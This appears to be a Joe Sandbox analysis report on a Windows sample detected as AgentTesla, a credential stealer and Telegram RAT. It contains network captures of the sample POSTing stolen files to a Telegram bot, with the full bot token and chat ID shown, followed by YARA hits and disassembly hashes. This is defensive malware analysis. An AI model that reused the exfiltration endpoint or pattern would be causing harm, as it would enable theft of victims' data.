                                                2024-05-17 23:39:23 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 66 35 38 31 39 62 39 64 39 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 31 36 35 31 32 38 34 38 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 66 35 38 31 39 62 39 64 39 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 31 38 2f 32 30 32 34 20 30 37 3a 32 33 3a 34 32 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcbf5819b9d90cContent-Disposition: form-data; name="chat_id"1165128482-----------------------------8dcbf5819b9d90cContent-Disposition: form-data; name="caption"New SC Recovered!Time: 08/18/2024 07:23:42User
                                                2024-05-17 23:39:23 UTC | 50 | OUT | Data Ascii: -----------------------------8dcbf5819b9d90c--
                                                2024-05-17 23:39:23 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-17 23:39:24 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:39:23 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                13 | 192.168.2.4 | 49752 | 149.154.167.220 | 443 | 6768 | C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-17 23:39:28 UTC | 262 | OUT | POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcc29e30c1ac2f
                                                Host: api.telegram.org
                                                Content-Length: 71967
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:39:29 UTC | 1024 | OUT | Data Ascii:
                                                -----------------------------8dcc29e30c1ac2f
                                                Content-Disposition: form-data; name="chat_id"

                                                1165128482
                                                -----------------------------8dcc29e30c1ac2f
                                                Content-Disposition: form-data; name="caption"

                                                New SC Recovered!

                                                Time: 08/22/2024 11:02:57
                                                User
                                                2024-05-17 23:39:29 UTC | 50 | OUT | Data Ascii: -----------------------------8dcc29e30c1ac2f--


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                14 | 192.168.2.4 | 49753 | 149.154.167.220 | 443 | 6768 | C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-17 23:39:30 UTC | 262 | OUT | POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcc6683c0d1efd
                                                Host: api.telegram.org
                                                Content-Length: 67000
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:39:30 UTC | 1024 | OUT | Data Ascii:
                                                -----------------------------8dcc6683c0d1efd
                                                Content-Disposition: form-data; name="chat_id"

                                                1165128482
                                                -----------------------------8dcc6683c0d1efd
                                                Content-Disposition: form-data; name="caption"

                                                New SC Recovered!

                                                Time: 08/27/2024 07:06:53
                                                User
                                                2024-05-17 23:39:30 UTC | 50 | OUT | Data Ascii: -----------------------------8dcc6683c0d1efd--
                                                2024-05-17 23:39:30 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-17 23:39:31 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:39:31 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                15 | 192.168.2.4 | 49754 | 149.154.167.220 | 443 | 6768 | C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-17 23:39:30 UTC | 262 | OUT | POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcc834c9eb4802
                                                Host: api.telegram.org
                                                Content-Length: 67000
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:39:30 UTC | 1024 | OUT | Data Ascii:
                                                -----------------------------8dcc834c9eb4802
                                                Content-Disposition: form-data; name="chat_id"

                                                1165128482
                                                -----------------------------8dcc834c9eb4802
                                                Content-Disposition: form-data; name="caption"

                                                New SC Recovered!

                                                Time: 08/29/2024 14:03:42
                                                User
                                                2024-05-17 23:39:30 UTC | 50 | OUT | Data Ascii: -----------------------------8dcc834c9eb4802--
                                                2024-05-17 23:39:31 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-17 23:39:31 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:39:31 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                16 | 192.168.2.4 | 49755 | 149.154.167.220 | 443 | 6768 | C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-17 23:39:41 UTC | 238 | OUT | POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dccd9f9e07d58a
                                                Host: api.telegram.org
                                                Content-Length: 67000
                                                Expect: 100-continue
                                                2024-05-17 23:39:41 UTC | 1024 | OUT | Data Ascii:
                                                -----------------------------8dccd9f9e07d58a
                                                Content-Disposition: form-data; name="chat_id"

                                                1165128482
                                                -----------------------------8dccd9f9e07d58a
                                                Content-Disposition: form-data; name="caption"

                                                New SC Recovered!

                                                Time: 09/05/2024 11:30:59
                                                User
                                                2024-05-17 23:39:41 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-17 23:39:42 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:39:41 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                17 | 192.168.2.4 | 49756 | 149.154.167.220 | 443
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-17 23:40:01 UTC | 262 | OUT | POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc76a92388cec9
                                                Host: api.telegram.org
                                                Content-Length: 67000
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:40:02 UTC | 1024 | OUT | Data Ascii:
                                                -----------------------------8dc76a92388cec9
                                                Content-Disposition: form-data; name="chat_id"

                                                1165128482
                                                -----------------------------8dc76a92388cec9
                                                Content-Disposition: form-data; name="caption"

                                                New SC Recovered!

                                                Time: 05/17/2024 19:39:59
                                                User
                                                2024-05-17 23:40:02 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-17 23:40:02 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:40:02 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Target ID:0
                                                Start time:19:35:54
                                                Start date:17/05/2024
                                                Path:C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe"
                                                Imagebase:0xfe0000
                                                File size:249'856 bytes
                                                MD5 hash:1022EEE3D28A81920664B590983AAFAA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1661358396.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000000.1661358396.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1661358396.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4108158269.0000000003351000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.4108158269.0000000003351000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.4108158269.0000000003351000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                  Execution Graph

                                                  Execution Coverage:13.2%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:26
                                                  Total number of Limit Nodes:2
                                                  [Execution graph not reproduced. API calls labelled on its nodes: MoveFileA, GlobalMemoryStatusEx]
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4111250182.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6730000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $dq$$dq$$dq$$dq$$dq$$dq
                                                  • API String ID: 0-2331353128
                                                  • Opcode ID: 5868023746b15f5348bc5d6215c50908316c2503fed7765f977359bedf41da2f
                                                  • Instruction ID: 2a8fbdbc9100e1dc8a7525c60140417f5ed17c2158638c86df8d9bee78db68af
                                                  • Opcode Fuzzy Hash: 5868023746b15f5348bc5d6215c50908316c2503fed7765f977359bedf41da2f
                                                  • Instruction Fuzzy Hash: ECD23834E102198FDB64DF68C594AADB7B2FF89310F54C5A9D409AB265EB34ED81CB80

                                                  Control-flow Graph

                                                  [Control-flow graph not reproduced. Legend: Executed / Not Executed]
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4111250182.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6730000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $dq$$dq$$dq$$dq$$dq$$dq
                                                  • API String ID: 0-2331353128
                                                  • Opcode ID: 44b6449df751eaff2890638c9bc6d227384aee6d2af9fb783d27592473b7d206
                                                  • Instruction ID: 756100d8c5d1d7a1efe957ddbcd94daff0116fac0d86b6ff7189c41a5e5fd9d4
                                                  • Opcode Fuzzy Hash: 44b6449df751eaff2890638c9bc6d227384aee6d2af9fb783d27592473b7d206
                                                  • Instruction Fuzzy Hash: 89026070E102298FDF64CF68D4806AEB7F2FB85310F24856AD605DB292EB75DC85CB91

                                                  Control-flow Graph

                                                  [Control-flow graph not reproduced. Legend: Executed / Not Executed]
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4111250182.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6730000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0oGp$DqGp$PHdq
                                                  • API String ID: 0-1641917722
                                                  • Opcode ID: a14ae6bf6d7ae1d52f14becea4ab1c7509ae69c4e322ac3dc7f9b07ba206a854
                                                  • Instruction ID: da83b8f31a89599358dee25d53518da930570288dbdc0076c2ac9d2d84215d5a
                                                  • Opcode Fuzzy Hash: a14ae6bf6d7ae1d52f14becea4ab1c7509ae69c4e322ac3dc7f9b07ba206a854
                                                  • Instruction Fuzzy Hash: 4822AF30B102158FDB55DB68D584BAEB7F6EF88310F218569D40AEB3A2DB35EC41CB91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4111250182.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6730000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $dq$$dq
                                                  • API String ID: 0-2340669324
                                                  • Opcode ID: 4b2785ab062febb7585ef5f461aeccc026f0c0aab4080ffa35471c4134861699
                                                  • Instruction ID: 4d348ed564fa1c64d123cfcbdd572c4a021bccb3c6b84dcd6e958d90a8cc8df3
                                                  • Opcode Fuzzy Hash: 4b2785ab062febb7585ef5f461aeccc026f0c0aab4080ffa35471c4134861699
                                                  • Instruction Fuzzy Hash: 06029C30B102299FDB54DB68D994B6EB7E6FF88310F248529D905DB396DB35EC42CB80

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4111250182.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6730000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Xhq$$dq
                                                  • API String ID: 0-4001282582
                                                  • Opcode ID: 8474d3626f71c0303ef6a146d10644cfd04720e1e511f594887105a8f5925baa
                                                  • Instruction ID: 5cf3d5f2821b0ced4f883bc5723db2a5b507bbc1dc7c877a7579faed70eae406
                                                  • Opcode Fuzzy Hash: 8474d3626f71c0303ef6a146d10644cfd04720e1e511f594887105a8f5925baa
                                                  • Instruction Fuzzy Hash: 0FB19275B002289FDB68EF78945427E7BA7BFC8750B15C42EE456DB385DE388C028791
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4107933800.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3210000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ce54268fa4a3c2eab6fc1f40331da331b3c803e11bfa697987ab0e3a64f117a5
                                                  • Instruction ID: cc5a8f418babda99f20732df0c4c342d92bc390999f650ae69861233d185d1fe
                                                  • Opcode Fuzzy Hash: ce54268fa4a3c2eab6fc1f40331da331b3c803e11bfa697987ab0e3a64f117a5
                                                  • Instruction Fuzzy Hash: 7453F731D10B1A8ADB11EF68C8846A9F7B1FF99300F55D79AE44877121FB70AAD4CB81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4107933800.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3210000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: deeb0bdc963e69a8532d45d246429ec107622377f2b0dd6fe18a390c601eebee
                                                  • Instruction ID: eb0bd05661657562094984fd9a0001a793732e4757766ab7320913172408119e
                                                  • Opcode Fuzzy Hash: deeb0bdc963e69a8532d45d246429ec107622377f2b0dd6fe18a390c601eebee
                                                  • Instruction Fuzzy Hash: C0333031D1061ACECB11EF68C9806ADF7B5FF99300F15C79AD458A7221EB70AAD5CB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4111250182.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6730000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $
                                                  • API String ID: 0-3993045852
                                                  • Opcode ID: b435f44676f58b2d20ee70dbc65a8d6b07519b44517d66828d7bee559bd3893a
                                                  • Instruction ID: 1d3688985d401a3bd935ed98850ce73e9875c11ddf6383035e14aaffcb1ae598
                                                  • Opcode Fuzzy Hash: b435f44676f58b2d20ee70dbc65a8d6b07519b44517d66828d7bee559bd3893a
                                                  • Instruction Fuzzy Hash: 3922A071E00265DFDF60DBA4C5806BEBBB2FF89320F208569D855AB396DA35DC41CB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4107933800.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3210000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: \Vl
                                                  • API String ID: 0-682378881
                                                  • Opcode ID: c36d9b8bf7d9e09e204259c5aa3bd518d4c9bb7cbd290cab2b9d74a56564ad57
                                                  • Instruction ID: dc98da4cafd825a2924aebfcc9cb85971a5d398acf26275ae5adc15e8de8ddb3
                                                  • Opcode Fuzzy Hash: c36d9b8bf7d9e09e204259c5aa3bd518d4c9bb7cbd290cab2b9d74a56564ad57
                                                  • Instruction Fuzzy Hash: 77B17270E1020A8FDB14DFAADA857DDFBF2BF98304F188129D419E7254EB749891CB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4107933800.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3210000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: \Vl
                                                  • API String ID: 0-682378881
                                                  • Opcode ID: 524ad0d7681283b18652149fa9ccede0bdb46c0b7ca64382d82818962442dd34
                                                  • Instruction ID: b879bc2ba51b377eac7510672df36a70b3cfe568b49b4dd2a3d9e4a7ad88f347
                                                  • Opcode Fuzzy Hash: 524ad0d7681283b18652149fa9ccede0bdb46c0b7ca64382d82818962442dd34
                                                  • Instruction Fuzzy Hash: 1F918270E10209DFDF14DFAACA817DDBBF2BF98714F188129E418AB254DB749895CB81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4111250182.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6730000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d0982d4513018884c70dfae511b89ddc54949b963232499eba547b4fc52ca201
                                                  • Instruction ID: b3091068565db2b5afbb88402d14aa1a6ffbea751f442871afd33659e4800aa3
                                                  • Opcode Fuzzy Hash: d0982d4513018884c70dfae511b89ddc54949b963232499eba547b4fc52ca201
                                                  • Instruction Fuzzy Hash: 58628D34A102189FDB58DB68D584BADB7F2EF88310F148569E906EB395DB35EC42CB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4111250182.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6730000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a0aff6287c32f469e602e7f2497da390316d7e90348c38b22ad9f323e475eea3
                                                  • Instruction ID: 7d92376fc66c7fb2f8a5f7ed87db0f75077a1facdf7519182a02c067f52ff605
                                                  • Opcode Fuzzy Hash: a0aff6287c32f469e602e7f2497da390316d7e90348c38b22ad9f323e475eea3
                                                  • Instruction Fuzzy Hash: 2D32AF70F102199FDB54DB68D881BAEB7B6FB88310F108429E545EB352DB35EC42CB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4111250182.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6730000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f7d1e180df5e68a76bd9abbf6a53f862fe46d6455fc0679df6f938de9ae3ee80
                                                  • Instruction ID: a8469172c435fa93e77a27c1f91c4463adb76bad31cb0bfb90d280261d9e4936
                                                  • Opcode Fuzzy Hash: f7d1e180df5e68a76bd9abbf6a53f862fe46d6455fc0679df6f938de9ae3ee80
                                                  • Instruction Fuzzy Hash: 93228470E101198FDF64CBA8D4807BEB7F6EB89310F248526D649DB392EA75DC81CB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4107933800.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3210000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fa360b8da46fd2e6a06d5ae4040fd09d348f7a7afe4a0eae182deb307fcac0b7
                                                  • Instruction ID: 81da546b51ae01612c9a71e040b6e2753b9c3d2be0428e803b12b9bfb8698070
                                                  • Opcode Fuzzy Hash: fa360b8da46fd2e6a06d5ae4040fd09d348f7a7afe4a0eae182deb307fcac0b7
                                                  • Instruction Fuzzy Hash: 84B17470E1020A8FDF14DFA9DA817DEBBF2BF58314F188529D418EB254EB749895CB81

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3139 321675c-32174b2 3142 32174b4-32174ba 3139->3142 3143 32174bd-32174c1 3139->3143 3142->3143 3144 32174c3-32174c6 3143->3144 3145 32174c9-32174fd MoveFileA 3143->3145 3144->3145 3146 3217506-321751a 3145->3146 3147 32174ff-3217505 3145->3147 3147->3146
                                                  APIs
                                                  • MoveFileA.KERNEL32(?,00000000,?,?), ref: 032174F0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4107933800.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3210000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity
                                                  • API ID: FileMove
                                                  • String ID:
                                                  • API String ID: 3562171763-0
                                                  • Opcode ID: f725666af6365afb658dc5edef5b8092517f95d40ed21494257b1474e4118a50
                                                  • Instruction ID: 422bb9f5a9d9758ac1f5614532557f0f9bdc7e6e07e1fea26237b07d1ec6e211
                                                  • Opcode Fuzzy Hash: f725666af6365afb658dc5edef5b8092517f95d40ed21494257b1474e4118a50
                                                  • Instruction Fuzzy Hash: 0621F4B6C112099FCB10CF99D984ADEFFF5FB88310F24845AE958AB304D3759A54CBA4
                                                  APIs
                                                  • MoveFileA.KERNEL32(?,00000000,?,?), ref: 032174F0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4107933800.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3210000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity
                                                  • API ID: FileMove
                                                  • String ID:
                                                  • API String ID: 3562171763-0
                                                  • Opcode ID: 2841f7eeda37ba3d68fc4a22bc598ffc137bd6421ed38662ed0cb793f5430da0
                                                  • Instruction ID: f01374efdfe0f49468554097eb9b6da62fe8455b0f30cbb2378c959777c3e457
                                                  • Opcode Fuzzy Hash: 2841f7eeda37ba3d68fc4a22bc598ffc137bd6421ed38662ed0cb793f5430da0
                                                  • Instruction Fuzzy Hash: 5E2127B6C002499FCB10CF99D984ADEFFF5FB88310F24805AE818AB244C3759A44CFA0
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 0673E6BF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4111250182.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6730000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 78208f6a4e7f59df436903d7ec616529b6406f0bd816fb0fba2bdef451842c87
                                                  • Instruction ID: 944b9ed41ce9144ab7ead3a20eab5a5cdb6cfe969b7f981a5a3f066e1e6d2996
                                                  • Opcode Fuzzy Hash: 78208f6a4e7f59df436903d7ec616529b6406f0bd816fb0fba2bdef451842c87
                                                  • Instruction Fuzzy Hash: 301103B6C00659DFCB10CF9AD545BDEFBB4AF08320F14856AD518A7640D378A940CFA5
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 0673E6BF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4111250182.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6730000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 73c5a6c7498a2fef773bda5ede29e6d89c093300d98f3fbeca19d4eafacf20d7
                                                  • Instruction ID: 0aed538c6b83f2b1c5f5f226dfb2b1a88624b94b51ef5b7b6c5504b109d7f994
                                                  • Opcode Fuzzy Hash: 73c5a6c7498a2fef773bda5ede29e6d89c093300d98f3fbeca19d4eafacf20d7
                                                  • Instruction Fuzzy Hash: 5C1123B1C0065ADBCB10CF9AC444BDEFBF4AF48320F14816AE918B7640D378A940CFA5
                                                  Strings
                                                  Memory Dump Source
